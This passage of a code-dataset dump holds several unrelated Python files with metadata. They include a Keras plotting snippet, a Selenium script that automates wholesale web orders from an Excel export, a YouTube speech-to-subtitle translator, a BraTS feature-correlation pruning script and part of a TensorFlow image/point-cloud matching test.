plotDecisionBoundary(X, y_cat, model):\n xSpan = np.linspace(min(X[:, 0]) - 1, max(X[:, 0]) + 1, 50)\n ySpan = np.linspace(min(X[:, 1]) - 1, max(X[:, 1]) + 1, 50)\n xx, yy = np.meshgrid(xSpan, ySpan)\n xx_, yy_ = xx.ravel(), yy.ravel()\n grid = np.c_[xx_, yy_]\n predFunc = np.argmax(model.predict(grid), axis =-1 )\n z = predFunc.reshape(xx.shape)\n plt.contourf(xx, yy, z)\n\nplotDecisionBoundary(X, y_cat, model)\n\nplt.scatter(X[y==0, 0], X[y==0, 1])\nplt.scatter(X[y==1, 0], X[y==1, 1])\nplt.scatter(X[y==2, 0], X[y==2, 1])\nplt.scatter(X[y==3, 0], X[y==3, 1])\nplt.scatter(X[y==4, 0], X[y==4, 1])\nx = 0.5\ny = 0.5\npoint = np.array([[x, y]])\nprediction = np.argmax(model.predict(point), axis =-1 )\nplt.plot([x], [y], marker='o', markersize=10, color='red')\nprint(\"Prediction is\", prediction)\nplt.show()", "sub_path": "Multiclass.py", "file_name": "Multiclass.py", "file_ext": "py", "file_size_in_byte": 1708, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 11, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "352229087", "text": 
"\"\"\"\n\n発注専用ウェブサイトの自動入力システム\n\n基幹システムから注文拠点ごとにデータを修正してエクセルへ貼付。\n注文システム起動。\n住所を確認してエンター完了。\n\n注文完了後Gsuite,GMailメールアドレスへ注文確認メールが届くので\n深夜、注文当日のGoogleAppsScriptでスプレッドシートへ注文内容をまとめて\nエクセルへ出力したのち指定のフォルダへ移動後に担当者へメールで処理後に報告。\n\n\"\"\"\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import Select # 選択画面\nfrom bs4 import BeautifulSoup\nimport pandas as pd \nimport csv\nimport time\nimport jaconv # 半角カナ文字対応\nimport pyodbc # DB\n\n# ChromeDriver\nchromedriverPath = \"chromedriver.exe\"\n\n# ログイン\nlogin_page_url = \"https://*****.bcart.jp/login.php\"\nlogin_id = \"****\"\nlogin_pass = \"****\"\n\n# 基本データ\nExcelFile = \"tmp_SmileBS_修正登録ファイル.xls\" # 基幹システムからエクスポートしたデータを入れる。\nCsvFileName = 'tmp_Web_登録用データ.csv' # 登録用の一時ファイルCSVを作成する。\n\n# 商品コードに該当商品の注文用URLを入れる。\nSyoHinCode = {}\nSyoHinCode['46990002'] = \"https://*****.bcart.jp/product.php?id=3\" # ポテトチップス(スタンダード)\nSyoHinCode['46990102'] = \"https://*****.bcart.jp/product.php?id=6\" # ポテトチップス(コンソメ)\n\n# 得意先データベースから個別の得意先データを取り出す。\ndef TokuiSakiData(TokuiSakiBanGo):\n\n TokuiSakiBanGo = str(TokuiSakiBanGo).zfill(8) # 8桁ゼロ埋め\n\n ConfigDic = {}\n ConfigDic['instance'] = \"***.***.***.***\\SMILEBS\" # インスタンス\n ConfigDic['user'] = \"***\" # ユーザー\n ConfigDic['pasword'] = \"***\" # パスワード\n ConfigDic['db'] = \"****_DB\" # DB #######がテストDB\n\n connection = \"DRIVER={SQL Server};SERVER=\" + ConfigDic['instance'] + \";uid=\" + ConfigDic['user'] + \\\n \";pwd=\" + ConfigDic['pasword'] + \";DATABASE=\" + ConfigDic['db']\n con = pyodbc.connect(connection)\n\n TABLE = \"****_T_TOKUISAKI_MST\" # 得意先マスターテーブル\n cur = con.cursor()\n sql = \"select * FROM \" + TABLE + \" WHERE TOK_CD = \" + str(TokuiSakiBanGo)\n cur.execute(sql)\n record = cur.fetchone()\n cur.close()\n con.close()\n\n TokuiSakiDataDic = {}\n TokuiSakiDataDic['得意先番号'] = int(record[0])\n TokuiSakiDataDic['得意先名'] = record[1].strip()\n TokuiSakiDataDic['郵便番号'] = record[3].strip()\n TokuiSakiDataDic['住所'] = record[4].strip() + record[5].strip()\n TokuiSakiDataDic['電話番号'] = record[6].strip()\n TokuiSakiDataDic['ルート'] = int(record[15]) # 注文済みデータ収集用\n TokuiSakiDataDic['請求書拠点'] = int(record[80]) # 注文済みデータ収集用\n\n return TokuiSakiDataDic\n\n# ChromeDriverのパスを引数に指定しChromeを起動\ndriver = webdriver.Chrome(chromedriverPath)\n\n# BeatifulSoupパーサー\ndef BsParse(source):\n return BeautifulSoup(source, 'html.parser')\n\n# 登録修正ファイルのデータをCSV化\ndef FileMake(ExcelFile, CsvFile):\n KobetsuNum = 0\n df = pd.read_excel(ExcelFile, skiprows=1, header=1)\n df_check = df[ df['個別発注番号'] > KobetsuNum ]\n df_check.to_csv(CsvFile, header=0, index=0)\n\n# 発注用にデータを作成したCSVをリスト化\ndef HattyuDataCsv(CsvFileName):\n HattyuList = []\n with open(CsvFileName,\"r\",encoding=\"utf-8\")as f:\n file = csv.reader(f)\n for x in file:\n HattyuList.append(x)\n\n # 昇順ソートで確認リストの順に処理ができる。\n HattyuList.sort(key=lambda x: x[3], reverse=False)\n return HattyuList\n\n#ログイン\ndef Login(login_page_url,login_id,login_pass):\n\n #ログインページへ\n driver.get(login_page_url)\n\n Xpath_loginidbox = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[1]/td/input\"\n driver.find_element_by_xpath(Xpath_loginidbox).send_keys(login_id)\n\n Xpath_loginpassbox = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[2]/td/input\"\n driver.find_element_by_xpath(Xpath_loginpassbox).send_keys(login_pass)\n\n Xpath_loginbutton = \"/html/body/div[1]/div/div/form/section[2]/input\"\n driver.find_element_by_xpath(Xpath_loginbutton).click()\n\n# メイン\ndef SyoHinPageData(HattyuList):\n\n for h in HattyuList:\n\n driver.get(SyoHinCode[h[8]]) # 商品ページ遷移\n source = 
driver.page_source\n        soup = BsParse(source)\n\n        TokuiNum = h[0] # customer number\n        #TokuiName = jaconv.h2z(HattyuList[1],digit=False, ascii=False)\n        TokuiRyaku = h[1]\n        KobetsuBanGo = str(int(float(h[4])))\n        TyakaBi = h[7]\n        TyuMonKoSu = str(int(h[10])) # order quantity\n        print(\"*** 発注情報 *****************************************************\")\n        print(\"得意先番号: \",str(TokuiNum))\n        print(\"得意先略称: \",str(TokuiRyaku))\n        print(\"★ 着荷日 : \",str(TyakaBi))\n        print(\"★ 個別番号: \",str(KobetsuBanGo))\n        print(\"★ 注文個数: \",str(TyuMonKoSu),\"\\n\")\n\n        # work out which arrival-date block to use\n        title_text = soup.find_all('h2') # all arrival-date headings: \"[**]YYYYmmdd着荷商品\",\"[**]YYYYmmdd着荷商品\", ...\n        TyakaBi_result = TyakaBi.split(\"-\")\n        TyakaBiText = TyakaBi_result[0] + TyakaBi_result[1] + TyakaBi_result[2].zfill(2)\n\n        for x in title_text:\n            result = x.text.replace(\"[**]\",\"\")\n            result = result.replace(\"着荷商品\",\"\")\n\n            if result == TyakaBiText:\n                #print(result,TyakaBiText)\n                Xpath_index = int(title_text.index(x)) + 1\n\n        # enter the order quantity\n        Xpath_KonyuSu = \"/html/body/div[1]/div/div/form/section[1]/table/tbody/tr[\" + str(Xpath_index) + \"]/td[3]/div[2]/div[2]/input\"\n        driver.find_element_by_xpath(Xpath_KonyuSu).send_keys(TyuMonKoSu)\n\n        # press the add-to-cart button\n        Xpath_CurtButton = \"/html/body/div[1]/div/div/form/section[2]/button\"\n        driver.find_element_by_xpath(Xpath_CurtButton).click()\n\n        time.sleep(2) # without a pause after the add-to-cart popup, the item sometimes fails to go into the cart\n\n        # view the cart\n        driver.get(\"https://*****.bcart.jp/cart.php\")\n\n        # proceed to order\n        Xpath_TyuMonButton = '//*[@id=\"cartForm1\"]/div[4]/ul/li[4]/button/span'\n        driver.find_element_by_xpath(Xpath_TyuMonButton).click()\n\n        # ship to a different address.\n        Xpath_BetsuHaisouButton = '/html/body/div[1]/div/div/form/section[3]/div/table[1]/tbody/tr/td/label[2]'\n        driver.find_element_by_xpath(Xpath_BetsuHaisouButton).click()\n\n        # put the customer number into the delivery-address company-name field\n        Xpath_KaisyaName = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[1]/td/input\"\n        driver.find_element_by_xpath(Xpath_KaisyaName).send_keys(TokuiNum) # customer number\n\n        # enter the individual order number\n        Xpath_HaisouSakiSelect = '/html/body/div[1]/div/div/form/section[6]/div/table/tbody/tr/td/input'\n        items = driver.find_element_by_xpath(Xpath_HaisouSakiSelect).send_keys(KobetsuBanGo)\n\n        # also print the order details to the console.\n        TokuiSakiDataDic = TokuiSakiData(TokuiNum) # DB lookup\n        PostCodeA = str(TokuiSakiDataDic['郵便番号'][:3])\n        PostCodeB = str(TokuiSakiDataDic['郵便番号'][4:])\n        TokuiName = jaconv.h2z(TokuiSakiDataDic['得意先名']) # h2z: half-width to full-width\n        PhoneNo = TokuiSakiDataDic['電話番号']\n\n        print(\"(\" + str(int(TokuiNum)) + \")\",TokuiName)\n        print(\"郵便 :\", TokuiSakiDataDic['郵便番号'])\n        print(\"住所 :\", TokuiSakiDataDic['住所'])\n        address = TokuiSakiDataDic['住所']\n        print(\"★ TEL:\" + PhoneNo)\n        print(\"★ 個別番号: \",str(KobetsuBanGo),\"\\n\")\n\n        # postal code: enter the first 3 digits\n        Xpath_YubinA = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[4]/td/input[1]\"\n        driver.find_element_by_xpath(Xpath_YubinA).send_keys(PostCodeA)\n\n        # postal code: enter the last 4 digits\n        Xpath_YubinB = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[4]/td/input[2]\"\n        driver.find_element_by_xpath(Xpath_YubinB).send_keys(PostCodeB)\n\n        time.sleep(2) # pause for the auto-fill that follows postal-code entry\n\n        # read the value of the street-address box, e.g. 東京都杉並区 \"神田\"← ~\n        Xpath_BanChi = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[7]/td/input\"\n        BanChi = driver.find_element_by_xpath(Xpath_BanChi).get_attribute(\"value\")\n\n        # split the customer address on the street-address box's value.\n        address_result = address.split(BanChi)\n\n        # enter the latter half of the address\n        Xpath_AddressC = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[8]/td/input\"\n        
driver.find_element_by_xpath(Xpath_AddressC).send_keys(jaconv.h2z(address_result[-1]))\n\n        # phone number: the site rejects it if a hyphen is missing or misplaced\n        Xpath_PhoneNo = '/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[9]/td/input'\n        driver.find_element_by_xpath(Xpath_PhoneNo).send_keys(PhoneNo)\n\n        # put the customer name into the delivery-address contact-person field.\n        Xpath_TantoSyaName = \"/html/body/div[1]/div/div/form/section[3]/div/table[2]/tbody[2]/tr[3]/td/input\"\n        driver.find_element_by_xpath(Xpath_TantoSyaName).send_keys(TokuiName) # customer name\n\n        CheckAddress = input(\"配送先住所を確認してください\\n\\n\\n\") # the customer address may not match the postal-code auto-fill, so confirm it, then press Enter\n        print(\"----------------------------------------------------------------------------\")\n\n        # navigating onward too quickly causes an error.\n        Xpath_KakuninButton = '//*[@id=\"__js-submit\"]'\n        driver.find_element_by_xpath(Xpath_KakuninButton).click() # to the order \"confirmation\" screen\n\n        time.sleep(2) # 2-second pause; it crashed without one\n\n        Xpath_TyumonKakutei = '//*[@id=\"orderForm\"]/section[6]/button/span'\n        driver.find_element_by_xpath(Xpath_TyumonKakutei).click() # to the order \"finalize\" screen\n\n        time.sleep(2) # 2-second pause; it crashed without one\n\n\nif __name__ == \"__main__\":\n\n    FileMake(ExcelFile, CsvFileName) # build \"tmp_Web_登録用データ.csv\" from \"tmp_SmileBS_修正登録ファイル.xls\"\n    HattyuList = HattyuDataCsv(CsvFileName) # turn the prepared order data into a list\n    Login(login_page_url,login_id,login_pass) # log in\n    SyoHinPageData(HattyuList) # from quantity entry through the order-finalize screen\n", "sub_path": "WebHattyuSystem.py", "file_name": "WebHattyuSystem.py", "file_ext": "py", "file_size_in_byte": 10978, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyodbc.connect", "line_number": 54, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 76, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 76, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 85, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 93, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 159, "usage_type": "call"}, {"api_name": "jaconv.h2z", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 202, "usage_type": "call"}, {"api_name": "jaconv.h2z", "line_number": 213, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 230, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "184503828", "text": "# @author Huaze Shen\n# @date 2020-03-13\n\nfrom typing import List\n\n\ndef min_array(numbers: List[int]) -> int:\n    min_val = numbers[0]\n    for num in numbers:\n        if num < min_val:\n            min_val = num\n    return min_val\n\n\nif __name__ == '__main__':\n    numbers_ = [2, 2, 2, 0, 1]\n    print(min_array(numbers_))\n", "sub_path": "python/find_minimum_in_rotated_sorted_array_ii.py", "file_name": "find_minimum_in_rotated_sorted_array_ii.py", "file_ext": "py", "file_size_in_byte": 320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.List", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "161474314", "text": "from pydub import AudioSegment\nfrom pydub.utils import make_chunks\nimport speech_recognition as sr\nfrom pytube import YouTube\nimport subprocess\nfrom googletrans import Translator\nimport os,os.path\nimport time\nimport datetime\n\nchunk_length_ms = 3000 \ntime2 = int(chunk_length_ms / 1000)\ntime3 = 2\n\ndef strt3(t3):\n\tb=[]\n\tl = len(t3)\n\ta=25\n\tfor n in range(l):\n\t\tif n 
% a == 0:\n\t\t\tb.append(t3[n:n+a])\n\n\treturn '\\n'.join(b)\n\ndef timestr(t):\n\tt1=t*time2\n\tt2=(t+1)*time2\n\tstr1=str(datetime.timedelta(seconds=t1))\n\tstr2=str(datetime.timedelta(seconds=t2))\n\tstr3='0'+str1+'.000 --> 0'+str2+'.000'\n\treturn str3\n\n# web is the YouTube video URL\nweb='https://www.youtube.com/watch?v=mIxgx4eRVp8'\n\ntranslator = Translator()\nYouTube(web).streams.get_by_itag(22).download(filename='videoplayback')\n\ncommand = \"ffmpeg -i videoplayback.mp4 -ab 160k -ac 2 -ar 44100 -vn y2mate.wav\"\nsubprocess.call(command, shell=True)\n\nmyaudio = AudioSegment.from_file(\"y2mate.wav\" , \"wav\") \nchunks = make_chunks(myaudio, chunk_length_ms)\n\nfor i, chunk in enumerate(chunks):\n    chunk_name = \"chunk{0}.wav\".format(i)\n    print(\"exporting\", chunk_name)\n    chunk.export(chunk_name, format=\"wav\")\n\nr=sr.Recognizer()\nt=[]\nt3=[]\ntotal=i+1\na=int(total/12)\nb=total%12\nc=a*12\nt.append('hello')\nfor i in range(0,total):\n\tharvard=sr.AudioFile('chunk'+str(i)+'.wav')\n\twith harvard as source:\n\t\taudio=r.record(source)\n\t\ttry:\n\t\t\ts=r.recognize_google(audio)\n\t\t\tt.append(s)\n\t\texcept Exception:\n\t\t\tt.append('')\n\t\tprint(i)\n\t\ttime.sleep(time3)\n\nfor i, val in enumerate(t):\n\ttry:\n\t\tt3.append(translator.translate(val, dest='zh-cn').text)\n\texcept Exception:\n\t\tt3.append('')\n\tprint(i)\n\ttime.sleep(time3)\n\ntxt=''\n\nfor i, val in enumerate(t):\n\tif i!=0:\n\t\tj=i-1\n\t\ttxt=txt+str(i)+'\\n'+timestr(j)+'\\n'+strt3(t3[i])+'\\n'+val+'\\n\\n'\n\t\tprint(i)\n\nf=open('videoplayback.srt','w',encoding='utf-8')\nf.write('\\ufeff')\nf.write(txt)\nf.close()\n\nfor i in range(0,total):\n\tfilename='chunk'+str(i)+'.wav'\n\tif(os.path.exists(filename)):\n\t\tos.remove(filename) ", "sub_path": "speechrecognition.py", "file_name": "speechrecognition.py", "file_ext": "py", "file_size_in_byte": 1964, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "datetime.timedelta", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 29, "usage_type": "call"}, {"api_name": "googletrans.Translator", "line_number": 36, "usage_type": "call"}, {"api_name": "pytube.YouTube", "line_number": 37, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 40, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 42, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 42, "usage_type": "name"}, {"api_name": "pydub.utils.make_chunks", "line_number": 43, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 50, "usage_type": "call"}, {"api_name": "speech_recognition.AudioFile", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "72797720", "text": "#!/usr/bin/env python3\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef encode_eor(inp: str):\n    if type(inp) != str:\n        if not np.isfinite(inp):\n            return np.NaN\n    elif inp == \"GTR\":\n        return 1\n    else:\n        return 0\n\n\ninpfeat = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/trainingfeatures_Cg055_stdnorm.csv\",\n                      
index_col=\"ID\")\n# load c-index information\ncindices = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/concordanceidx_training_nobinduplicates_stdnorm.csv\", index_col=\"Feature\")\n# handle alive patient with setting OS to 500 days\ninpfeat.loc[inpfeat[\"Survival_days\"] == 'ALIVE (361 days later)', \"Survival_days\"] = 500\ninpfeat[\"Survival_days\"] = inpfeat[\"Survival_days\"].astype(np.float)\n\n# encode EOR\n# inpfeat[\"Extent_of_Resection\"] = [encode_eor(elem) for elem in inpfeat[\"Extent_of_Resection\"]]\nfeatprocess_nosurv = inpfeat.drop(columns=[\"Survival_days\"])\nfeatprocess_nosurv = inpfeat.drop(columns=[\"Survival_class\"])\n\n# check mutual correlation of features\nprint(\"- calculating correlation matrix\")\ncorr_matrix = featprocess_nosurv.corr().abs()\nprint(\"- finished calculating correlation matrix\")\n# # corr_matrix.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_trainingfeat.csv\")\n\n# corr_matrix = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_trainingfeat.csv\")\n# corr_matrix.set_index(\"Unnamed: 0\", inplace=True)\nprint(\"Data loaded.\")\n\n# save correlation matrix\ncorr_matrix.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/corrmatrix_c055_stdnorm.csv\")\ncorr_np = corr_matrix.to_numpy()\nmask = np.triu(np.ones_like(corr_np, dtype=np.bool))\ncorr_masked = corr_matrix.mask(mask)\n\nmaxcorr = np.nanmax(corr_masked.values.flatten())\ncurr_corrmat = corr_masked\n\ncurrfeat = featprocess_nosurv\niterateidx = 0\nwhile maxcorr > 0.95:\n print(iterateidx)\n testidx = corr_masked[corr_masked == maxcorr].stack().index.tolist()\n\n featdroplist = []\n # for each highly correlated feature pair, only keep the one with the higher c-index\n for featcomb in testidx:\n # look up c-indices of both features, keep the one with the larger\n curr_cindlist = [cindices.loc[elem, \"ConcordanceIndex\"] for elem in featcomb]\n # add the lower one to the drop list\n featdroplist.append(featcomb[np.argmin(curr_cindlist)])\n\n featdroplist_unique = np.unique(featdroplist)\n currfeat.drop(columns=featdroplist_unique, inplace=True)\n\n curr_corrmat = currfeat.corr().abs()\n corr_np = curr_corrmat.to_numpy()\n mask = np.triu(np.ones_like(corr_np, dtype=np.bool))\n corr_masked = curr_corrmat.mask(mask)\n\n maxcorr = np.nanmax(corr_masked.values.flatten())\n print(maxcorr)\n print(currfeat.shape)\n iterateidx += 1\n print('----------')\n\nprint(currfeat.shape)\n# put survival column back into the feature matrix\nsurvinfo = inpfeat[\"Survival_days\"]\niterativecorr = currfeat.merge(survinfo, on=\"ID\")\niterativecorr.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/trainingfeatures_iterativeremoved_stdnorm.csv\")\n\n# plot correlation matrix\nf = plt.figure(figsize=(200, 200))\nplt.matshow(corr_masked)\n# only show group ticks\nfeattypes = [elem.split('_')[0:2] for elem in currfeat.columns]\nlabels = np.array([[0,15],[16,36],[37,82],[83,111],[112,149]])\n\n# plt.xticks(range(corr_matrix.shape[1]), corr_matrix.columns, fontsize=5, rotation=45)\n# plt.xticks(range(corr_masked.shape[1]), corr_masked.columns, fontsize=2, rotation=90)\n# plt.yticks(range(corr_masked.shape[1]), corr_masked.columns, fontsize=2)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=8)\n# plt.title('Correlation Matrix', 
fontsize=16)\nplt.tight_layout()\nplt.savefig(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/reducedcorr_iterative_stdnorm.png\", dpi=400)\nplt.show()\n", "sub_path": "classicalml/standardnorm/checkcorrelation_iterative_stdnorm.py", "file_name": "checkcorrelation_iterative_stdnorm.py", "file_ext": "py", "file_size_in_byte": 4002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.isfinite", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.triu", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.nanmax", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.matshow", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "602725192", "text": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 14 00:40:27 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 21:35:04 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 21:17:55 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 1 10:43:52 2018\n\n@author: mengdan\n\"\"\"\n\n#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 20:25:02 2018\n\n@author: mengdan\n\"\"\"\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom vgg16 import vgg16\nfrom pointNet import pointNet\nfrom read_dataset import Data, splitTrainTest, shuffleTrainset\n\nimport os\nimport cv2\n\nbatch_size = 16\nimage_size = 128\npcl_size = 1024\nimage_feature_dim = 256\npcl_feature_dim = 256\n\nthresh_dist = 
0.5\n\ndate_time = '2015-02-13-09-16-26'\nsift_iss_correspond_dir = '/media/mengdan/data3/robotcar/grasshopper/2d_3d_correspondences_256/' + date_time\n\n\n\ndef readTestData(sift_test_root, iss_test_root):\n    # get the test list which stores sift patches\n    # patch_file = list[submap_id][image_id][patch_id]\n    sift_test_list = []\n    for submap_folder in sorted(os.listdir(sift_test_root)):\n        submap_img_folder_list = []\n        submap_folder_path = sift_test_root+submap_folder\n        for image_folder in sorted(os.listdir(submap_folder_path)):\n            img_folder_file_list = []\n            img_folder_path = submap_folder_path + '/' +image_folder\n            for img_file in sorted(os.listdir(img_folder_path)):\n                if img_file.endswith('.png'):\n                    img_folder_file_list.append(img_folder_path + '/'+ img_file)\n            submap_img_folder_list.append(img_folder_file_list)\n        sift_test_list.append(submap_img_folder_list)\n\n    # get the test list which stores iss volumes\n    # iss_file = list[submap_id][iss_id]\n    iss_test_list = []\n    for submap_folder in sorted(os.listdir(iss_test_root)):\n        submap_iss_file_list = []\n        submap_folder_path = iss_test_root + submap_folder\n        for iss_file in sorted(os.listdir(submap_folder_path)):\n            if iss_file.endswith('.pcd'):\n                submap_iss_file_list.append(submap_folder_path+'/'+iss_file)\n        iss_test_list.append(submap_iss_file_list)\n\n    return sift_test_list, iss_test_list\n\n\ndef getSIFTTestBatch(sift_test_list, batch_id):\n    img_batch = np.zeros([batch_size, image_size, image_size,3], np.float32) \n    start_id = batch_id * batch_size\n    end_id = (batch_id + 1) * batch_size \n\n    if (end_id > len(sift_test_list)):\n        print(\"------ Error reading sift test batch!\")\n        return None\n\n    # read batch\n    data = Data(batch_size, image_size, pcl_size, None, None)\n    list_batch = sift_test_list[start_id:end_id]\n    for i in range(len(list_batch)):\n        img = cv2.imread(list_batch[i])\n        img = data.img_augmentation(img)\n        img_batch[i,:,:,:] = img\n\n    return img_batch\n\ndef getISSTestBatch(iss_test_list, batch_id):\n    pos_pcl_batch = np.zeros([batch_size, pcl_size, 3], np.float32)\n    start_id = batch_id * batch_size\n    end_id = (batch_id + 1) * batch_size \n\n    if (end_id > len(iss_test_list)):\n        print(\"------ Error reading iss test batch!\")\n        return None\n\n    # read batch\n    data = Data(batch_size, image_size, pcl_size, None, None)\n    list_batch = 